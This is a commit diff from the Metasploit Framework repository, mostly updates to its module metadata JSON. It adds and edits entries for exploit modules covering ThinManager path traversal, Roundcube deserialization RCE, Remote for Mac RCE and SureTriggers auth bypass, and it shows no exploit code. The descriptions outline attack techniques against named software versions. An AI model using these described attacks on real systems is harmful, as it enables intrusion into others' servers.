automatic module_metadata_base.json update

Merge pull request #20300 from zeroSteiner/fix/mod/smb-version/win-ver
Fix a regression in Windows version fingerprinting
2025-06-11 21:32:04 +00:00 · 2025-06-11 22:23:57 +01:00 · 2025-06-11 11:56:56 -04:00 · 2025-06-11 08:57:20 +00:00 · 2025-06-11 10:48:58 +02:00 · 2025-06-11 11:05:33 +03:00
110 changed files with 4396 additions and 1419 deletions
@@ -152,6 +152,11 @@ Style/RedundantAssignment:
    and return expression
  Enabled: false

+Style/RedundantParentheses:
+  Description: >-
+    Disabled as it sometimes improves the readability of code
+  Enabled: false
+
 Style/RedundantRegexpArgument:
  Enabled: true
  Exclude:
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.67)
+    metasploit-framework (6.4.69)
      aarch64
      abbrev
      actionpack (~> 7.1.0)
@@ -475,7 +475,8 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.15)
+    rex-random_identifier (0.1.16)
+      bigdecimal
      rex-text
    rex-registry (0.1.6)
    rex-rop_builder (0.1.6)
@@ -93,7 +93,7 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.4, "New BSD"
 metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.67, "New BSD"
+metasploit-framework, 6.4.69, "New BSD"
 metasploit-model, 5.0.3, "New BSD"
 metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
@@ -23,3 +23,4 @@ W32TIME_ALT
 wkssvc
 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
 db2remotecmd
+CxUIUSvcChannel
@@ -787,7 +787,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-03-21 10:30:20 +0000",
+    "mod_time": "2025-06-04 11:22:26 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/cve_2022_26923_certifried",
@@ -8822,6 +8822,49 @@
      }
    ]
  },
+  "auxiliary_admin/networking/thinmanager_traversal_delete": {
+    "name": "ThinManager Path Traversal (CVE-2023-2915) Arbitrary File Delete",
+    "fullname": "auxiliary/admin/networking/thinmanager_traversal_delete",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2023-08-17",
+    "type": "auxiliary",
+    "author": [
+      "Michael Heinzl",
+      "Tenable"
+    ],
+    "description": "This module exploits a path traversal vulnerability (CVE-2023-2915) in\n          ThinManager <= v13.1.0 to delete arbitrary files from the system.\n          The affected service listens by default on TCP port 2031 and runs in the\n          context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "CVE-2023-2915",
+      "URL-https://www.tenable.com/security/research/tra-2023-28",
+      "URL-https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 2031,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-06-09 09:17:11 +0000",
+    "path": "/modules/auxiliary/admin/networking/thinmanager_traversal_delete.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/thinmanager_traversal_delete",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_admin/networking/thinmanager_traversal_upload": {
    "name": "ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload",
    "fullname": "auxiliary/admin/networking/thinmanager_traversal_upload",
@@ -8833,9 +8876,9 @@
      "Michael Heinzl",
      "Tenable"
    ],
-    "description": "This module exploits a path traversal vulnerability (CVE-2023-27855 ) in ThinManager <= v13.0.1 to upload arbitrary files to the target system.\n\n          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\\SYSTEM.",
+    "description": "This module exploits a path traversal vulnerability (CVE-2023-27855) in\n          ThinManager <= v13.0.1 to upload arbitrary files to the target system.\n          The affected service listens by default on TCP port 2031 and runs in the\n          context of NT AUTHORITY\\SYSTEM.",
    "references": [
-      "CVE-2023-27855 ",
+      "CVE-2023-27855",
      "URL-https://www.tenable.com/security/research/tra-2023-13",
      "URL-https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1138640"
    ],
@@ -8845,7 +8888,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-15 21:55:58 +0000",
+    "mod_time": "2025-06-09 09:17:11 +0000",
    "path": "/modules/auxiliary/admin/networking/thinmanager_traversal_upload.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/thinmanager_traversal_upload",
@@ -8877,9 +8920,9 @@
      "Michael Heinzl",
      "Tenable"
    ],
-    "description": "This module exploits a path traversal vulnerability (CVE-2023-2917) in ThinManager <= v13.1.0 to upload arbitrary files to the target system.\n\n          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\\SYSTEM.",
+    "description": "This module exploits a path traversal vulnerability (CVE-2023-2917) in\n          ThinManager <= v13.1.0 to upload arbitrary files to the target system.\n          The affected service listens by default on TCP port 2031 and runs in the\n          context of NT AUTHORITY\\SYSTEM.",
    "references": [
-      "CVE-2023-2917 ",
+      "CVE-2023-2917",
      "URL-https://www.tenable.com/security/research/tra-2023-28",
      "URL-https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471"
    ],
@@ -8889,7 +8932,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-15 21:55:27 +0000",
+    "mod_time": "2025-06-09 09:17:11 +0000",
    "path": "/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/thinmanager_traversal_upload2",
@@ -18422,6 +18465,49 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_fileformat/maldoc_in_pdf_polyglot": {
+    "name": "Maldoc in PDF Polyglot converter",
+    "fullname": "auxiliary/fileformat/maldoc_in_pdf_polyglot",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "mekhalleh (RAMELLA Sebastien)"
+    ],
+    "description": "A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file\n          structure of PDF.\n\n          If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.\n\n          The attack does not bypass configured macro locks. And the malicious macros are also not executed when the\n          file is opened in PDF readers or similar software.",
+    "references": [
+      "URL-https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html",
+      "URL-https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/",
+      "URL-https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/",
+      "URL-https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-06-04 12:33:22 +0000",
+    "path": "/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/maldoc_in_pdf_polyglot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_fileformat/multidrop": {
    "name": "Windows SMB Multi Dropper",
    "fullname": "auxiliary/fileformat/multidrop",
@@ -26420,7 +26506,7 @@
      "Michael Heinzl",
      "Tenable"
    ],
-    "description": "This module exploits a path traversal vulnerability (CVE-2023-27856) in ThinManager <= v13.0.1 to retrieve arbitrary files from the system.\n\n          The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\\SYSTEM.",
+    "description": "This module exploits a path traversal vulnerability (CVE-2023-27856) in\n          ThinManager <= v13.0.1 to retrieve arbitrary files from the system.\n          The affected service listens by default on TCP port 2031 and runs in the\n          context of NT AUTHORITY\\SYSTEM.",
    "references": [
      "CVE-2023-27856",
      "URL-https://www.tenable.com/security/research/tra-2023-13",
@@ -26432,7 +26518,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-04 19:18:43 +0000",
+    "mod_time": "2025-06-09 09:17:11 +0000",
    "path": "/modules/auxiliary/gather/thinmanager_traversal_download.rb",
    "is_install_path": true,
    "ref_name": "gather/thinmanager_traversal_download",
@@ -26726,7 +26812,7 @@
      "Hynek Petrak",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update, only if upgraded from a previous release line, such as\n          6.0 or 6.5.\n          If the bind username and password are provided (BIND_DN and BIND_PW\n          options), these credentials will be used instead of attempting an\n          anonymous bind.",
+    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update, only if upgraded from a previous release line, such as\n          6.0 or 6.5.\n          If the bind username and password are provided (BIND_DN and LDAPPassword\n          options), these credentials will be used instead of attempting an\n          anonymous bind.",
    "references": [
      "CVE-2020-3952",
      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
@@ -26737,7 +26823,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2024-05-02 13:57:13 +0000",
+    "mod_time": "2025-06-05 16:33:42 +0000",
    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
    "is_install_path": true,
    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -52317,7 +52403,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-05-21 10:45:08 +0000",
+    "mod_time": "2025-06-11 11:56:56 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -61746,6 +61832,7 @@
    "type": "exploit",
    "author": [
      "Andre Moulu",
+      "Elliot Alderson",
      "jduck <jduck@metasploit.com>",
      "joev <joev@metasploit.com>"
    ],
@@ -61762,7 +61849,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-04-26 01:28:35 +0000",
+    "mod_time": "2025-06-07 17:55:17 +0000",
    "path": "/modules/exploits/android/browser/samsung_knox_smdm_url.rb",
    "is_install_path": true,
    "ref_name": "android/browser/samsung_knox_smdm_url",
@@ -63403,7 +63490,7 @@
    "targets": [
      "FreeBSD 6.2-Release Bruteforce"
    ],
-    "mod_time": "2025-04-13 00:38:37 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/freebsd/tacacs/xtacacsd_report.rb",
    "is_install_path": true,
    "ref_name": "freebsd/tacacs/xtacacsd_report",
@@ -63795,7 +63882,7 @@
      "Evgeny Legerov <admin@gleg.net>",
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "This module exploits a stack-based buffer overflow in versions 1.2 through\n        1.3.0 of ProFTPD server. The vulnerability is within the \"sreplace\" function\n        within the \"src/support.c\" file.\n\n        The off-by-one heap overflow bug in the ProFTPD sreplace function has been\n        discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n        this off-by-one bug via MKD command, but failed. We did not work on this bug\n        since then.\n\n        Actually, there are exists at least two bugs in sreplace function, one is the\n        mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow\n        via 'sstrncpy(dst,src,negative argument)'.\n\n        We were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n        version, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n        1. another (integer) overflow in sreplace!\n        2. now it is possible to reach sreplace stack-based buffer overflow bug via\n          the \"pr_display_file\" function!\n        3. stupid '.message' file display bug\n\n        So we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n        To reach the bug, you need to upload a specially created .message file to a\n        writeable directory, then do \"CWD <writeable directory>\" to trigger the invocation\n        of sreplace function.\n\n        Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'\n        file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n        The exploit is a part of VulnDisco Pack since Dec 2005.",
+    "description": "This module exploits a stack-based buffer overflow in versions 1.2 through\n          1.3.0 of ProFTPD server. The vulnerability is within the \"sreplace\" function\n          within the \"src/support.c\" file.\n\n          The off-by-one heap overflow bug in the ProFTPD sreplace function has been\n          discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n          this off-by-one bug via MKD command, but failed. We did not work on this bug\n          since then.\n\n          Actually, there are exists at least two bugs in sreplace function, one is the\n          mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow\n          via 'sstrncpy(dst,src,negative argument)'.\n\n          We were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n          version, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n          1. another (integer) overflow in sreplace!\n          2. now it is possible to reach sreplace stack-based buffer overflow bug via\n          the \"pr_display_file\" function!\n          3. stupid '.message' file display bug\n\n          So we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n          To reach the bug, you need to upload a specially created .message file to a\n          writeable directory, then do \"CWD <writeable directory>\" to trigger the invocation\n          of sreplace function.\n\n          Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'\n          file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n          The exploit is a part of VulnDisco Pack since Dec 2005.",
    "references": [
      "CVE-2006-5815",
      "OSVDB-68985",
@@ -63820,14 +63907,25 @@
      "Debug",
      "ProFTPD 1.3.0 (source install) / Debian 3.1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 22:36:46 +0000",
    "path": "/modules/exploits/linux/ftp/proftp_sreplace.rb",
    "is_install_path": true,
    "ref_name": "linux/ftp/proftp_sreplace",
    "check": true,
    "post_auth": false,
    "default_credential": false,
-    "notes": {},
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ]
+    },
    "session_types": false,
    "needs_cleanup": null
  },
@@ -63841,7 +63939,7 @@
    "author": [
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "This module exploits a stack-based buffer overflow in versions of ProFTPD\n        server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n        large number of Telnet IAC commands, an attacker can corrupt memory and\n        execute arbitrary code.\n\n        The Debian Squeeze version of the exploit uses a little ROP stub to indirectly\n        transfer the flow of execution to a pool buffer (the cmd_rec \"res\" in\n        \"pr_cmd_read\").\n\n        The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub\n        to it, and execute the stub. The stub then copies the remainder of the payload\n        in and executes it.\n\n        NOTE: Most Linux distributions either do not ship a vulnerable version of\n        ProFTPD, or they ship a version compiled with stack smashing protection.\n\n        Although SSP significantly reduces the probability of a single attempt\n        succeeding, it will not prevent exploitation. Since the daemon forks in a\n        default configuration, the cookie value will remain the same despite\n        some attempts failing. By making repeated requests, an attacker can eventually\n        guess the cookie value and exploit the vulnerability.\n\n        The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness\n        and could allow exploitation in semi-reasonable amount of time.",
+    "description": "This module exploits a stack-based buffer overflow in versions of ProFTPD\n          server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a\n          large number of Telnet IAC commands, an attacker can corrupt memory and\n          execute arbitrary code.\n\n          The Debian Squeeze version of the exploit uses a little ROP stub to indirectly\n          transfer the flow of execution to a pool buffer (the cmd_rec \"res\" in\n          \"pr_cmd_read\").\n\n          The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub\n          to it, and execute the stub. The stub then copies the remainder of the payload\n          in and executes it.\n\n          NOTE: Most Linux distributions either do not ship a vulnerable version of\n          ProFTPD, or they ship a version compiled with stack smashing protection.\n\n          Although SSP significantly reduces the probability of a single attempt\n          succeeding, it will not prevent exploitation. Since the daemon forks in a\n          default configuration, the cookie value will remain the same despite\n          some attempts failing. By making repeated requests, an attacker can eventually\n          guess the cookie value and exploit the vulnerability.\n\n          The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness\n          and could allow exploitation in semi-reasonable amount of time.",
    "references": [
      "CVE-2010-4221",
      "OSVDB-68985",
@@ -63859,14 +63957,24 @@
      "ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)",
      "ProFTPD 1.3.2c Server (Ubuntu 10.04)"
    ],
-    "mod_time": "2021-03-17 06:51:08 +0000",
+    "mod_time": "2025-06-10 22:36:46 +0000",
    "path": "/modules/exploits/linux/ftp/proftp_telnet_iac.rb",
    "is_install_path": true,
    "ref_name": "linux/ftp/proftp_telnet_iac",
    "check": true,
    "post_auth": false,
    "default_credential": false,
-    "notes": {},
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ]
+    },
    "session_types": false,
    "needs_cleanup": null
  },
@@ -67051,7 +67159,7 @@
      "PHP In-Memory",
      "Unix/Linux Command Shell"
    ],
-    "mod_time": "2025-04-30 16:16:30 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb",
    "is_install_path": true,
    "ref_name": "linux/http/craftcms_preauth_rce_cve_2025_32432",
@@ -91188,7 +91296,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-04-18 01:46:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb",
    "is_install_path": true,
    "ref_name": "mainframe/ftp/ftp_jcl_creds",
@@ -93112,7 +93220,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/multi/browser/msfd_rce_browser.rb",
    "is_install_path": true,
    "ref_name": "multi/browser/msfd_rce_browser",
@@ -94071,7 +94179,7 @@
      "RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)",
      "Debug"
    ],
-    "mod_time": "2025-05-21 18:27:24 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb",
    "is_install_path": true,
    "ref_name": "multi/ftp/wuftpd_site_exec_format",
@@ -96307,7 +96415,7 @@
      "Linux Command",
      "Windows Command"
    ],
-    "mod_time": "2024-06-12 19:15:01 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/cacti_package_import_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/cacti_package_import_rce",
@@ -99896,7 +100004,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2025-05-21 08:39:52 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/invision_customcss_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/invision_customcss_rce",
@@ -106276,6 +106384,65 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/roundcube_auth_rce_cve_2025_49113": {
+    "name": "Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization",
+    "fullname": "exploit/multi/http/roundcube_auth_rce_cve_2025_49113",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-02",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "Kirill Firsov"
+    ],
+    "description": "Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution\n          by authenticated users because the _from parameter in a URL is not validated\n          in program/actions/settings/upload.php, leading to PHP Object Deserialization.\n\n          An attacker can execute arbitrary system commands as the web server.",
+    "references": [
+      "CVE-2025-49113",
+      "URL-https://fearsoff.org/research/roundcube"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Dropper",
+      "Linux Command"
+    ],
+    "mod_time": "2025-06-11 11:05:33 +0000",
+    "path": "/modules/exploits/multi/http/roundcube_auth_rce_cve_2025_49113.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/roundcube_auth_rce_cve_2025_49113",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/rudder_server_sqli_rce": {
    "name": "Rudder Server SQLI Remote Code Execution",
    "fullname": "exploit/multi/http/rudder_server_sqli_rce",
@@ -106968,7 +107135,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-09-11 11:46:52 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/spip_bigup_unauth_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spip_bigup_unauth_rce",
@@ -107032,7 +107199,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-09-08 07:01:23 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/spip_connect_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spip_connect_exec",
@@ -107094,7 +107261,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-09-08 07:54:11 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spip_porte_plume_previsu_rce",
@@ -107158,7 +107325,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-09-08 07:01:23 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/spip_rce_form.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spip_rce_form",
@@ -109365,7 +109532,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:01:52 +0000",
    "path": "/modules/exploits/multi/http/uptime_file_upload_2.rb",
    "is_install_path": true,
    "ref_name": "multi/http/uptime_file_upload_2",
@@ -110600,7 +110767,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-08-24 17:27:13 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/wp_backup_migration_php_filter.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_backup_migration_php_filter",
@@ -111083,7 +111250,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-06-05 10:14:48 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/wp_hash_form_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_hash_form_rce",
@@ -111820,7 +111987,7 @@
    "needs_cleanup": true
  },
  "exploit_multi/http/wp_suretriggers_auth_bypass": {
-    "name": "WordPress SureTriggers Auth Bypass and RCE",
+    "name": "WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)",
    "fullname": "exploit/multi/http/wp_suretriggers_auth_bypass",
    "aliases": [],
    "rank": 600,
@@ -111828,14 +111995,18 @@
    "type": "exploit",
    "author": [
      "Michael Mazzolini (mikemyers)",
+      "Denver Jackson",
      "Khaled Alenazi (Nxploited)",
      "Valentin Lobstein"
    ],
-    "description": "This module exploits an authorization bypass in the WordPress SureTriggers plugin (<= 1.0.78).\n          It first creates a new administrator account via the unauthenticated REST endpoint,\n          then uploads and executes a PHP payload using FileDropper for remote code execution.",
+    "description": "Exploits two distinct authorization bypasses in SureTriggers/OttoKit plugin:\n          - CVE-2025-3102: admin creation via St-Authorization Bearer (empty)\n          - CVE-2025-27007: reset access key via connection endpoint & admin creation with Bearer header",
    "references": [
      "CVE-2025-3102",
+      "CVE-2025-27007",
      "URL-https://github.com/Nxploited/CVE-2025-3102",
-      "URL-https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/"
+      "URL-https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/",
+      "URL-https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve",
+      "URL-https://cloud.projectdiscovery.io/library/CVE-2025-27007"
    ],
    "platform": "Linux,PHP,Unix,Windows",
    "arch": "php, cmd",
@@ -111860,7 +112031,7 @@
      "Unix In-Memory",
      "Windows In-Memory"
    ],
-    "mod_time": "2025-05-11 17:53:06 +0000",
+    "mod_time": "2025-05-22 23:22:43 +0000",
    "path": "/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_suretriggers_auth_bypass",
@@ -111880,7 +112051,17 @@
      ]
    },
    "session_types": false,
-    "needs_cleanup": true
+    "needs_cleanup": true,
+    "actions": [
+      {
+        "name": "CVE-2025-27007",
+        "description": "SureTriggers <= 1.0.82 auth bypass, reset & RCE"
+      },
+      {
+        "name": "CVE-2025-3102",
+        "description": "SureTriggers <= 1.0.78 auth bypass & RCE"
+      }
+    ]
  },
  "exploit_multi/http/wp_time_capsule_file_upload_rce": {
    "name": "WordPress WP Time Capsule Arbitrary File Upload to RCE",
@@ -111922,7 +112103,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2024-12-12 18:04:10 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_time_capsule_file_upload_rce",
@@ -117054,6 +117235,62 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/http/remote_for_mac_rce": {
+    "name": "Remote for Mac Unauthenticated RCE",
+    "fullname": "exploit/osx/http/remote_for_mac_rce",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-27",
+    "type": "exploit",
+    "author": [
+      "Chokri Hammedi ( <Chokri Hammedi (@blue0x1)>"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution vulnerability in\n          Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.\n          When authentication is disabled on the target system, it allows attackers to execute\n          arbitrary AppleScript commands, which can include shell commands via `do shell script`.\n          All versions up to 2025.7 (including patch versions) are vulnerable.",
+    "references": [
+      "PACKETSTORM-195347"
+    ],
+    "platform": "OSX,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-06-08 15:36:37 +0000",
+    "path": "/modules/exploits/osx/http/remote_for_mac_rce.rb",
+    "is_install_path": true,
+    "ref_name": "osx/http/remote_for_mac_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_osx/local/acronis_trueimage_xpc_privesc": {
    "name": "Acronis TrueImage XPC Privilege Escalation",
    "fullname": "exploit/osx/local/acronis_trueimage_xpc_privesc",
@@ -120154,7 +120391,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2025-06-10 23:01:52 +0000",
    "path": "/modules/exploits/unix/http/pfsense_graph_injection_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_graph_injection_exec",
@@ -138944,7 +139181,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-SP2"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/browser/orbit_connecting.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/orbit_connecting",
@@ -141530,7 +141767,7 @@
    "targets": [
      "ACDSee 9.0 (Build 1008)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-06-10 23:57:52 +0000",
    "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/acdsee_xpm",
@@ -142414,7 +142651,7 @@
    "targets": [
      "Windows XP SP3 with DEP bypass"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
